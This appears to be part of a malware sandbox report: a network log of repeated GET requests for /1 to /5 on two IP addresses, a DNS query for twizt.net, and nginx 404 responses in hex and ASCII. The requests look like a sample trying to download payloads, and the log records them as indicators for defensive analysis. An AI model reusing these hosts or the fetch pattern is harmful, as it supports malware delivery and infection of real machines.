    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficDNS traffic detected: DNS query: twizt.net
    Source: global trafficDNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:11 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:14 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
